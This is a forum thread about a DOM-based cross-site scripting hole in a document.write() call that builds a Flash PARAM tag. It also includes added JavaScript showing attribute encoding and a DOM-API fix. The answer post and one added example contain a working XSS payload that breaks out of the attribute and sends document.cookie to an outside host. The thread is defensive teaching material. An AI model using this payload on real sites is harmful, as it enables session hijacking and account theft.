DOM-Based Cross-Site Scripting

  • Question

  • User1879451342 posted

    I am not very familiar with DOM-Based Cross-Site Scripting but have been informed that the following line of code (taken from a .js file) is leaving my site vulnerable:

    document.write("<PARAM NAME=FlashyVars VALUE='" + strFlashyVars + "'>");

    Does anyone know how this could be manipulated or remedied?

    Thanks,

    cj

    Wednesday, February 12, 2014 6:32 PM

Answers

  • User-760709272 posted

    It depends where strFlashyVars comes from.  If I can change it to

    '/><script>document.getElementById('someimage').src = 'http://mysite.com/?c=' + document.cookie + ';</script><p></p '

    then what gets written to your page is

    <PARAM NAME=FlashyVars VALUE=''/><script>document.getElementById('someimage').src = 'http://mysite.com/?c=' + document.cookie + ';</script><p></p ''>

    and your page is now giving me your cookies, letting me log in as you, or access the site as you, or get some kind of info from you.  Or I could redirect it off to my phishing page or make you go to a site that exploits a vulnerability, or anything really.

    • Marked as answer by Anonymous Thursday, October 7, 2021 12:00 AM
    Wednesday, February 12, 2014 6:48 PM
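    What the answer describes, as an added example that is not part of the original thread: the vulnerable document.write() concatenation from the question, reduced to plain string functions so it runs in Node without a browser, next to the attribute-encoding fix the OWASP DOM XSS cheat sheet recommends for this context. The function names are my own; the payload is the answer's, with the real property name document.cookie (the answer wrote document.cookies, which does not exist).

```javascript
// Added example, not code from the original thread. Function names and the
// check regex are assumptions made for the demonstration.

// Vulnerable: the exact concatenation from the question.
function buildParamVulnerable(strFlashyVars) {
  return "<PARAM NAME=FlashyVars VALUE='" + strFlashyVars + "'>";
}

// HTML attribute encoding (OWASP DOM XSS cheat sheet, attribute context):
// every non-alphanumeric character becomes a numeric entity &#xHH;, so the
// value can never contain a quote that ends the attribute or a "<" that
// starts a tag. The browser decodes the entities when it reads the
// attribute, so the Flash movie still receives the original text.
function encodeForHtmlAttribute(value) {
  return String(value).replace(/[^A-Za-z0-9]/gu, function (c) {
    return "&#x" + c.codePointAt(0).toString(16) + ";";
  });
}

// Fixed: same markup, but the untrusted value is encoded first.
function buildParamSafe(strFlashyVars) {
  return "<PARAM NAME=FlashyVars VALUE='" + encodeForHtmlAttribute(strFlashyVars) + "'>";
}

// Sanity check on the generated markup: well-formed output is one PARAM tag
// whose VALUE stays between its single quotes. Anything else means the value
// broke out of the attribute and the browser would see extra tags.
const SINGLE_PARAM = /^<PARAM NAME=FlashyVars VALUE='[^'<>]*'>$/;
function staysInsideAttribute(markup) {
  return SINGLE_PARAM.test(markup);
}

// Constructed payload: the answer's cookie stealer. It closes the quote and
// the tag, then injects a <script> that leaks document.cookie to mysite.com.
const payload = "'/><script>document.getElementById('someimage').src = " +
  "'http://mysite.com/?c=' + document.cookie + ';</script><p></p '";

console.log("benign:    ", buildParamVulnerable("level=3"),
  staysInsideAttribute(buildParamVulnerable("level=3")));
console.log("vulnerable:", buildParamVulnerable(payload),
  staysInsideAttribute(buildParamVulnerable(payload)));
console.log("encoded:   ", buildParamSafe(payload),
  staysInsideAttribute(buildParamSafe(payload)));
```

    The encoding is the minimum fix if document.write() has to stay; it only holds because the VALUE is quoted, so the quote characters must remain in the template exactly as they are. Note also that the value must come from a source that is encoded once, at the point of writing it into markup, not earlier in the code where a later step might decode it again.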

All replies

  • User1879451342 posted

    That is interesting, thanks.  It is being called from some .html pages.  Sometimes an empty string is being passed in, sometimes values.

    What is the remedy for this type of vulnerability?

    Thursday, February 13, 2014 9:44 AM
  • User1879451342 posted

    This is an informative article :  https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet

    However, I am still not sure how to prevent the attack since the .js file resides on the client.

    Thursday, February 13, 2014 10:02 AM
  • User1879451342 posted

    I think I have found a work-around as this page needs other updating.

    However, something along this line might be helpful to some scenarios:

           // Take everything after "name=" in the current URL.
           var pos = document.URL.indexOf("name=") + 5;
           var name = document.URL.substring(pos, document.URL.length);
           // Only letters and digits, over the whole string (the "+" is
           // needed; without it the pattern matches a single character only).
           if (name.match(/^[a-zA-Z0-9]+$/)) {
               document.write(strFlashyVars);   // "document.write", not "Document.Write"
           }
           else {
               window.alert("Security error");
           }

    Friday, February 14, 2014 8:49 AM
  • User-1949460947 posted

    Although using regexp to restrict the valid values to letters and numbers looks good to me (maybe you could add a length check), taking anything from the URL and rendering it directly into the page gives me a bad feeling. There are so many ways to do XSS: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

    I'm not sure there isn't a way to inject malicious content with only letters and numbers.

    György

    Saturday, February 22, 2014 4:35 AM
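    The input-side remedy, written up as an added example rather than code from the thread. It addresses the two weak spots in the workaround above: indexOf("name=") + substring also matches "username=" and returns everything to the end of the URL (including "&other=..." and "#fragment"), and the value is still written into markup. The code below parses the query with URLSearchParams, applies an anchored letters-and-digits allowlist with the length cap György suggested, and hands the value to the DOM as an attribute so the HTML parser never runs over it. The parameter name "name", the limit MAX_NAME_LENGTH and the function names are assumptions; doc is the real document in a browser and a small stub in the test.

```javascript
// Added example, not code from the thread. The parameter name "name", the
// limit MAX_NAME_LENGTH and the function names are assumptions.

const MAX_NAME_LENGTH = 32;              // assumed limit; adjust to the real field
const ALLOWED_NAME = /^[A-Za-z0-9]+$/;   // letters and digits only, whole string

// Returns the validated "name" query parameter, or null if it is missing,
// empty, too long, or contains anything outside the allowlist. URL and
// URLSearchParams do the decoding, so "%27" arrives as "'" and is rejected.
function extractName(urlString) {
  let url;
  try {
    url = new URL(urlString);
  } catch (e) {
    return null;                         // not a parseable URL
  }
  const raw = url.searchParams.get("name");
  if (raw === null) return null;
  if (raw.length === 0 || raw.length > MAX_NAME_LENGTH) return null;
  if (!ALLOWED_NAME.test(raw)) return null;
  return raw;
}

// Builds the <param> with DOM APIs. setAttribute stores the string as data;
// there is no attribute context to break out of, whatever the value holds.
// doc is any object with createElement (document in a browser).
function createFlashyParam(doc, value) {
  const param = doc.createElement("param");
  param.setAttribute("name", "FlashyVars");
  param.setAttribute("value", value);
  return param;
}

// Replacement for the document.write() call in the original .js file.
// Returns false, and renders nothing, where the original alerted
// "Security error".
function renderFlashyVars(doc, container, urlString) {
  const name = extractName(urlString);
  if (name === null) {
    return false;
  }
  container.appendChild(createFlashyParam(doc, name));
  return true;
}
```

    Plugin parameters are read when the enclosing OBJECT is instantiated, so build the param into its container before that container is attached to the page. The allowlist is the real control here; the DOM API is what makes the output step safe even if the allowlist is later loosened.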